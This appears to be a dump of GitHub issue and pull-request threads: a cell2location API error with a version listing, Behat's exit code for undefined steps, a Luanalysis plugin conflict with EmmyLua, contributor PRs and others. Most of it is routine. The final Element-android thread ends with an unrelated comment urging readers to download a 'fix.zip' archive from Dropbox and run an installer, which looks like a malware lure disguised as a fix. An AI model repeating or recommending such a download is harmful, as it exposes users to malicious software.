sc.settings.set_figure_params(dpi = 100, color_map = 'viridis', dpi_save = 100,
vector_friendly = True, format = 'pdf',
facecolor='white')
r = cell2location.run_cell2location(
# Single cell reference signatures as pd.DataFrame
# (could also be data as anndata object for estimating signatures
# as cluster average expression - `sc_data=adata_snrna_raw`)
sc_data=inf_aver,
# Spatial data as anndata object
sp_data=adata_vis,
# the column in sc_data.obs that gives cluster idenitity of each cell
summ_sc_data_args={'cluster_col': "annotation_1",
},
train_args={'use_raw': True, # By default uses raw slots in both of the input datasets.
'n_iter': 40000, # Increase the number of iterations if needed (see QC below)
# Whe analysing the data that contains multiple experiments,
# cell2location automatically enters the mode which pools information across experiments
'sample_name_col': 'sample'}, # Column in sp_data.obs with experiment ID (see above)
export_args={'path': results_folder, # path where to save results
'run_name_suffix': '' # optinal suffix to modify the name the run
},
model_kwargs={ # Prior on the number of cells, cell types and co-located groups
'cell_number_prior': {
# - N - the expected number of cells per location:
'cells_per_spot': 8, # < - change this
# - A - the expected number of cell types per location (use default):
'factors_per_spot': 7,
# - Y - the expected number of co-located cell type groups per location (use default):
'combs_per_spot': 7
},
# Prior beliefs on the sensitivity of spatial technology:
'gene_level_prior':{
# Prior on the mean
'mean': 1/2,
# Prior on standard deviation,
# a good choice of this value should be at least 2 times lower that the mean
'sd': 1/4
}
}
)
sc.logging.print_versions()
anndata 0.8.0
scanpy 1.9.1
PIL 9.2.0
absl NA
asttokens NA
attr 22.1.0
backcall 0.2.0
beta_ufunc NA
binom_ufunc NA
cell2location NA
cffi 1.15.1
chex 0.1.4
colorama 0.4.5
cycler 0.10.0
cython_runtime NA
dateutil 2.8.2
decorator 5.1.1
defusedxml 0.7.1
deprecate 0.3.2
docrep 0.3.2
entrypoints 0.4
etils 0.7.1
executing 0.10.0
flax 0.6.0
fsspec 2022.7.1
google NA
h5py 3.7.0
hypergeom_ufunc NA
igraph 0.9.11
ipykernel 6.15.1
ipython_genutils 0.2.0
ipywidgets 7.7.1
jax 0.3.16
jaxlib 0.3.15
jedi 0.18.1
joblib 1.1.0
kiwisolver 1.4.4
leidenalg 0.8.10
llvmlite 0.39.0
matplotlib 3.5.3
matplotlib_inline 0.1.5
mpl_toolkits NA
msgpack 1.0.4
mudata 0.2.0
multipledispatch 0.6.0
natsort 8.1.0
nbinom_ufunc NA
ncf_ufunc NA
numba 0.56.0
numpy 1.22.4
numpyro 0.10.0
opt_einsum v3.3.0
optax 0.1.3
packaging 21.3
pandas 1.4.3
parso 0.8.3
pexpect 4.8.0
pickleshare 0.7.5
pkg_resources NA
prompt_toolkit 3.0.30
psutil 5.9.1
ptyprocess 0.7.0
pure_eval 0.2.2
pycparser 2.21
pygments 2.13.0
pynndescent 0.5.7
pyparsing 3.0.9
pyro 1.8.1
pytorch_lightning 1.6.5
pytz 2022.2.1
rich NA
scipy 1.9.0
scvi 0.17.1
seaborn 0.11.2
session_info 1.0.0
setuptools 65.0.1
six 1.16.0
sklearn 1.1.2
stack_data 0.4.0
statsmodels 0.13.2
tensorboard 2.9.0
texttable 1.6.4
threadpoolctl 3.1.0
toolz 0.12.0
torch 1.12.1+cu102
torchmetrics 0.9.3
tornado 6.2
tqdm 4.64.0
traitlets 5.3.0
tree 0.1.7
typing_extensions NA
umap 0.5.3
wcwidth 0.2.5
yaml 6.0
zipp NA
zmq 23.2.1
IPython 8.4.0
jupyter_client 7.3.4
jupyter_core 4.11.1
notebook 6.4.12
Python 3.9.13 | packaged by conda-forge | (main, May 27 2022, 16:58:50) [GCC 10.3.0]
Linux-3.10.0-957.el7.x86_64-x86_64-with-glibc2.17
Session information updated at 2022-09-12 17:53
##
AttributeError Traceback (most recent call last)
Input In [19], in <cell line: 1>()
----> 1 r = cell2location.run_cell2location(
2
3 # Single cell reference signatures as pd.DataFrame
4 # (could also be data as anndata object for estimating signatures
5 # as cluster average expression - `sc_data=adata_snrna_raw`)
6 sc_data=inf_aver,
7 # Spatial data as anndata object
8 sp_data=adata_vis,
9
10 # the column in sc_data.obs that gives cluster idenitity of each cell
11 summ_sc_data_args={'cluster_col': "annotation_1",
12 },
13
14 train_args={'use_raw': True, # By default uses raw slots in both of the input datasets.
15 'n_iter': 40000, # Increase the number of iterations if needed (see QC below)
16
17 # Whe analysing the data that contains multiple experiments,
18 # cell2location automatically enters the mode which pools information across experiments
19 'sample_name_col': 'sample'}, # Column in sp_data.obs with experiment ID (see above)
20
21
22 export_args={'path': results_folder, # path where to save results
23 'run_name_suffix': '' # optinal suffix to modify the name the run
24 },
25
26 model_kwargs={ # Prior on the number of cells, cell types and co-located groups
27
28 'cell_number_prior': {
29 # - N - the expected number of cells per location:
30 'cells_per_spot': 8, # < - change this
31 # - A - the expected number of cell types per location (use default):
32 'factors_per_spot': 7,
33 # - Y - the expected number of co-located cell type groups per location (use default):
34 'combs_per_spot': 7
35 },
36
37 # Prior beliefs on the sensitivity of spatial technology:
38 'gene_level_prior':{
39 # Prior on the mean
40 'mean': 1/2,
41 # Prior on standard deviation,
42 # a good choice of this value should be at least 2 times lower that the mean
43 'sd': 1/4
44 }
45 }
46 )
AttributeError: module 'cell2location' has no attribute 'run_cell2location'
I am getting the same error message. Were you able to find a solution?
I am getting the same error message. Were you able to find a solution?
Sorry, I still have no idea (@_@).
|
2025-04-01T06:36:46.505612
| 2024-07-31T17:17:07
|
2440528878
|
{
"authors": [
"Maxnflaxl",
"messiisgreat"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:422",
"repo": "BeamMW/beam-web",
"url": "https://github.com/BeamMW/beam-web/pull/262"
}
|
gharchive/pull-request
|
Fix HF section
Checkout Points
[ ] Check if renaming to PoC done
[ ] Check if changing icons(5) done
[ ] Check if adding HF to menu(in dropdown and footer) done
Suggestion
Suggest better approach
can you send a screenshot of the 2023 and 2024 roadmap to confirm changes? Ty
check this plz
screenshot please ^^
|
2025-04-01T06:36:46.583856
| 2023-10-10T18:29:45
|
1935962022
|
{
"authors": [
"Rockleemode",
"XanderRubio"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:423",
"repo": "BeforeIDieCode/BeforeIDieAchievements",
"url": "https://github.com/BeforeIDieCode/BeforeIDieAchievements/pull/176"
}
|
gharchive/pull-request
|
Add Ma'aruf Muhammad to Before I Die
I am adding Ma'aruf Muhammad to Before I Die with images and text
I am adding Ma'aruf Muhammad to Before I Die with images and text
Hi @Rockleemode,
Thank you for taking the time to contribute and share your aspirations on what you would like to do before you pass away. I kindly request you to run your React localhost on your local server to see your contributions working. Currently, we are encountering an error with the preview deployment that is related to the React version being used. To make this process smoother, please go through your code again, ensure that you can see your code working on your development server, and then recommit. I may have to go through the code manually to avoid the error of dependencies being shown in the terminal. I will merge your code as soon as possible. However, if you could assist me by running your code on your local server and recommitting it within the next ten hours, it would be greatly appreciated as it will save me time when reviewing. Thank you, @Rockleemode, and have a great day!
Xander
Details
Yes, please go ahead @Rockleemode. Thank you for your patience, and I apologies for having to ask. I think after several pull requests we merged, it might have changed the package.json file recently from the main, and this is causing an issue when deploying from new contributors as I'm now seeing the same issue from another pull request and will need to dive further into the issue. For now, recommit and we will see if this possibly helps with the preview deployment. Thank you!
|
2025-04-01T06:36:46.586071
| 2023-10-16T05:41:02
|
1944407542
|
{
"authors": [
"XanderRubio",
"ignoreintuition"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:424",
"repo": "BeforeIDieCode/BeforeIDieAchievements",
"url": "https://github.com/BeforeIDieCode/BeforeIDieAchievements/pull/205"
}
|
gharchive/pull-request
|
Added profile for Brian Greig
Added profile and pictures
Also, @ignoreintuition if you have a LinkedIn let me know the link so I can mention you in our next Thank You Contributors post. Thank you!
Also, @ignoreintuition if you have a LinkedIn let me know the link so I can mention you in our next Thank You Contributors post. Thank you!
Absolutely @XanderRubio it's https://www.linkedin.com/in/bgreig/
|
2025-04-01T06:36:46.589669
| 2024-11-21T11:11:01
|
2679070135
|
{
"authors": [
"mvorisek",
"stof"
],
"license": "mit",
"license_source": "bigquery",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:425",
"repo": "Behat/Behat",
"url": "https://github.com/Behat/Behat/issues/1541"
}
|
gharchive/issue
|
Missing step does not exit with non-zero CLI code
CLI ouput like:
Feature: Checkbox
Scenario: # tests-behat/checkbox.feature:3
Given I am on "form-control/checkbox.php" # Behat\MinkExtension\Context\MinkContext::visit()
...
Then Toast display should contain text '...'
1 scenario (1 undefined)
8 steps (2 passed, 2 undefined, 4 skipped)
0m1.86s (12.32Mb)
>> <snippet_undefined><snippet_keyword>main</snippet_keyword> suite has undefined steps.
Please choose the context to generate snippets:</snippet_undefined>
[0] None
[1] Behat\MinkExtension\Context\MinkContext
[2] Atk4\Ui\Behat\Context
--- Behat\MinkExtension\Context\MinkContext has missing steps. Define them with these snippets:
/**
* @Then Toast display should contain text :arg4
*/
public function toastDisplayShouldContainText($arg1, $arg2, $arg3, $arg4): void
{
throw new PendingException();
}
silently exists with zero CLI exit code making it very hard to fail CI.
This is already partially possible in Behat. The --strict option will consider that skipped or pending scenarios should make the run use a failure exit code.
Maybe we need a third way of interpreting results which would allow skipped scenarios but reject pending ones.
Thank you very much for meantioning the --strict option - it does exactly what I want.
I personally would make it default, as CI should fail in case of undefined steps.
|
2025-04-01T06:36:46.601208
| 2017-11-28T21:58:41
|
277552794
|
{
"authors": [
"SairamShanmuganathan",
"ghost"
],
"license": "Unlicense",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:426",
"repo": "BenJam/proverif",
"url": "https://github.com/BenJam/proverif/issues/2"
}
|
gharchive/issue
|
Update syntax
all of these example got syntax error . How can I run on new version of Proverif Online ?
Did you get any code for the new version?
|
2025-04-01T06:36:46.611843
| 2021-12-30T10:39:11
|
1091020099
|
{
"authors": [
"Benedict-Carling",
"shrutiichandra"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:427",
"repo": "Benedict-Carling/spanish-conjugator",
"url": "https://github.com/Benedict-Carling/spanish-conjugator/pull/29"
}
|
gharchive/pull-request
|
conditional conjugation
added conjugation for conditional tense.
Looks great, thanks so much for the work!
Happy to help!!
|
2025-04-01T06:36:46.617886
| 2021-06-05T13:42:43
|
912269708
|
{
"authors": [
"Benjamin-Dobell",
"kerwanp"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:428",
"repo": "Benjamin-Dobell/IntelliJ-Luanalysis",
"url": "https://github.com/Benjamin-Dobell/IntelliJ-Luanalysis/issues/75"
}
|
gharchive/issue
|
Key duplicated on Windows
Environment
name
version
IDEA version
2021.1.2 Build #IU-211.7442.40
Luanalysis version
v1.2.3
OS
Windows 10
What are the steps to reproduce this issue?
Install Luanalysis
Restart the idea
What happens?
The idea does not start and show a critical error.
What were you expecting to happen?
Having the IDEA starting properly.
Any logs, error output, etc?
2021-06-05 15:28:08,486 [ 1288] INFO - STDERR - Start Failed
2021-06-05 15:28:08,486 [ 1288] INFO - STDERR - Internal error. Please refer to https://jb.gg/ide/critical-startup-errors
2021-06-05 15:28:08,486 [ 1288] INFO - STDERR -
2021-06-05 15:28:08,486 [ 1288] INFO - STDERR - java.util.concurrent.CompletionException: org.picocontainer.PicoRegistrationException: Key com.tang.intellij.lua.luacheck.LuaCheckSettings duplicated
2021-06-05 15:28:08,486 [ 1288] INFO - STDERR - at java.base/java.util.concurrent.CompletableFuture.encodeThrowable(CompletableFuture.java:314)
2021-06-05 15:28:08,486 [ 1288] INFO - STDERR - at java.base/java.util.concurrent.CompletableFuture.uniApplyNow(CompletableFuture.java:683)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.base/java.util.concurrent.CompletableFuture.uniApplyStage(CompletableFuture.java:658)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.base/java.util.concurrent.CompletableFuture.thenApply(CompletableFuture.java:2094)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at com.intellij.idea.ApplicationLoader.registerAppComponents(ApplicationLoader.kt:104)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at com.intellij.idea.ApplicationLoader.executeInitAppInEdt(ApplicationLoader.kt:63)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at com.intellij.idea.ApplicationLoader.access$executeInitAppInEdt(ApplicationLoader.kt:1)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at com.intellij.idea.ApplicationLoader$initApplication$1$1.run(ApplicationLoader.kt:363)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:313)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:776)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:727)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.base/java.security.AccessController.doPrivileged(Native Method)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:746)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - Caused by: org.picocontainer.PicoRegistrationException: Key com.tang.intellij.lua.luacheck.LuaCheckSettings duplicated
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at com.intellij.util.pico.DefaultPicoContainer.registerComponent(DefaultPicoContainer.java:119)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at com.intellij.serviceContainer.ComponentManagerImpl.registerServices(ComponentManagerImpl.kt:400)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at com.intellij.serviceContainer.ComponentManagerImpl.registerComponents(ComponentManagerImpl.kt:250)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at com.intellij.idea.ApplicationLoader$registerAppComponents$1.apply(ApplicationLoader.kt:106)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at com.intellij.idea.ApplicationLoader$registerAppComponents$1.apply(ApplicationLoader.kt)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - at java.base/java.util.concurrent.CompletableFuture.uniApplyNow(CompletableFuture.java:680)
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR - ... 19 more
2021-06-05 15:28:08,487 [ 1289] INFO - STDERR -
2021-06-05 15:28:08,488 [ 1290] INFO - STDERR - -----
Getting the same problem on Debian GNU/Linux 10 (buster)
@kerwanp I believe this occurs when you have both Luanalysis and EmmyLua installed simultaneously.
Luanalysis was forked from EmmyLua. The initial goal was to contribute everything upstream, so EmmyLua's settings (and storage there-of) were left unaltered. However, since then, Luanalysis' internals have diverged quite considerably from EmmyLua. At this pointit would be wise for me to go back through and stop making use of the com.tang.intellij.lua scope, which quite rightly belongs to EmmyLua.
For now, please ensure EmmyLua is not installed alongside Luanalysis.
That was the point, closing the issue.
|
2025-04-01T06:36:46.620818
| 2024-08-26T00:58:16
|
2485608778
|
{
"authors": [
"Benjamin-Loison",
"esttemanb"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:429",
"repo": "Benjamin-Loison/element-android",
"url": "https://github.com/Benjamin-Loison/element-android/issues/27"
}
|
gharchive/issue
|
Check easily up to when histories go?
Concerning Note to Self it is the same date as on on my Linux Mint 22 Cinnamon Framework 13 that is about:
date -d @1650663424
Fri Apr 22 11:37:04 PM CEST 2022
Would help Benjamin-Loison/android/issues/46.
On computer can use Export Chat.
Download
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.